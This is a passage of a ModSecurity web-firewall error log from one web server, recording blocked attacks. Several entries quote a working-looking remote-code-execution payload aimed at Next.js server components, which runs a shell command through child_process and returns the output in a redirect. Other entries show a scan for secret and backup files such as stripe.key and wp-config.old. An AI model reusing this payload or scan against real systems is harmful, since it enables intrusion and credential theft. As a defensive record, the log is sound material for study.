\\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab98JicV9LlDN1Y_DphtDQAAAIU"] [Sun Mar 22 07:20:38.655708 2026] [:error] [pid 8222:tid 8308] [client 18.185.88.68:38804] [client 18.185.88.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab98JicV9LlDN1Y_DphtDgAAAIE"] [Sun Mar 22 08:45:08.024135 2026] [:error] [pid 8398:tid 8409] [client 3.120.177.78:56176] [client 3.120.177.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab-P9HvC1dGBb1aHV4koYwAAAMg"] [Sun Mar 22 08:45:08.038485 2026] [:error] [pid 8398:tid 8403] [client 3.120.177.78:56176] [client 3.120.177.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab-P9HvC1dGBb1aHV4koZQAAAMI"] [Sun Mar 22 08:45:08.059793 2026] [:error] [pid 8398:tid 8414] [client 3.120.177.78:56176] [client 3.120.177.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "ab-P9HvC1dGBb1aHV4koZgAAAM0"] [Sun Mar 22 09:01:09.314139 2026] [:error] [pid 8220:tid 8290] [client 54.164.55.27:60996] [client 54.164.55.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "ab-TtT3AaMV3L4c4tcDXbAAAABE"] [Sun Mar 22 09:01:09.396595 2026] [:error] [pid 8220:tid 8275] [client 54.164.55.27:60996] [client 54.164.55.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "ab-TtT3AaMV3L4c4tcDXbQAAAAI"] [Sun Mar 22 09:01:09.486085 2026] [:error] [pid 8220:tid 8286] [client 54.164.55.27:60996] [client 54.164.55.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "ab-TtT3AaMV3L4c4tcDXbgAAAA0"] [Sun Mar 22 10:46:43.144954 2026] [:error] [pid 21858:tid 22040] [client 185.177.72.50:43646] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab-sc2LIqNiY03ULMH4rOAAAAQQ"] [Sun Mar 22 10:46:52.631914 2026] [:error] [pid 21858:tid 22048] [client 185.177.72.50:1546] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab-sfGLIqNiY03ULMH4rxAAAAQw"] [Sun Mar 22 10:46:52.705726 2026] [:error] [pid 8222:tid 8331] [client 185.177.72.50:1528] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab-sfCcV9LlDN1Y_Dpha6wAAAIw"] [Sun Mar 22 10:46:53.192947 2026] [:error] [pid 21858:tid 22037] [client 185.177.72.50:1686] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab-sfWLIqNiY03ULMH4r2QAAAQE"] [Sun Mar 22 10:46:53.875039 2026] [:error] [pid 8222:tid 8350] [client 185.177.72.50:1558] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab-sfScV9LlDN1Y_DphbCQAAAJc"] [Sun Mar 22 10:46:54.176771 2026] [:error] [pid 21858:tid 22052] [client 185.177.72.50:1686] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab-sfmLIqNiY03ULMH4sAAAAARA"] [Sun Mar 22 10:46:54.376619 2026] [:error] [pid 8222:tid 8314] [client 185.177.72.50:44390] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab-sficV9LlDN1Y_DphbHQAAAIQ"] [Sun Mar 22 10:46:54.548174 2026] [:error] [pid 29605:tid 29647] [client 185.177.72.50:1714] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab-sfi5oSxIYWLQVRq7QzQAAAdY"] [Sun Mar 22 10:46:54.781104 2026] [:error] [pid 8222:tid 8342] [client 185.177.72.50:1688] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab-sficV9LlDN1Y_DphbKgAAAJE"] [Sun Mar 22 10:46:54.839902 2026] [:error] [pid 8222:tid 8337] [client 185.177.72.50:1558] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab-sficV9LlDN1Y_DphbLQAAAI8"] [Sun Mar 22 10:46:58.353435 2026] [:error] [pid 8222:tid 8322] [client 185.177.72.50:2026] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab-sgicV9LlDN1Y_DphbdQAAAIg"] [Sun Mar 22 10:46:59.835641 2026] [:error] [pid 29605:tid 29647] [client 185.177.72.50:2084] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab-sgy5oSxIYWLQVRq7RAgAAAdY"] [Sun Mar 22 10:46:59.851302 2026] [:error] [pid 8222:tid 8322] [client 185.177.72.50:1956] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab-sgycV9LlDN1Y_DphbigAAAIg"] [Sun Mar 22 10:46:59.892521 2026] [:error] [pid 21858:tid 22052] [client 185.177.72.50:1584] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab-sg2LIqNiY03ULMH4sgwAAARA"] [Sun Mar 22 10:46:59.934060 2026] [:error] [pid 8222:tid 8306] [client 185.177.72.50:1956] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ 